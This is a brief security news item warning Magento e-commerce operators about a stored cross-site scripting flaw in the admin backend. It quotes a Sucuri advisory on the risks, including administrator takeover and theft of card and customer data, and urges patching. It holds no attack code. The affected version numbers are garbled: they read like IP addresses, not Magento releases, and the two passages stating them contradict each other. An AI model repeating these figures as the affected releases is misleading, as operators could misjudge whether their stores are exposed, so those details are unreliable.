Thousands of e-commerce companies, using Magento, are at risk as critical bug found in Magento. If you are using Magento to run your websites, patch it as soon as possible to protect your websites from massive attacks.
Stored XSS Flaw in Magento: It is found that the stored cross–site scripting (XSS) vulnerability exists in all versions of Magento community edition 18.104.22.168 and earlier including enterprise edition 22.214.171.124 and earlier. There is a plethora of consequences of the stored cross–site scripting (XSS) flaws. An attacker can take over your website via administrator account, steal the credit card information and customers’ data and control the Magento based online store through this flaw.
According to Sucuri Advisory, "This vulnerability affects almost every install of Magento CE <126.96.36.199 and Magento EE <188.8.131.52. The buggy snippet is located inside Magento core libraries, more specifically within the administrator’s backend. Unless you’re behind a WAF or you have a very heavily modified administration panel, you’re at risk." "As this is a Stored XSS vulnerability, this issue could be used by attackers to take over your site, create new administrator accounts, steal client information, anything a legitimate administrator account is allowed to do."
However, this vulnerability is patched and fixed. So, the awareness of latest bug and fixing it soon, is always considered as an active security action. The regular vulnerability test is required to have your websites secured.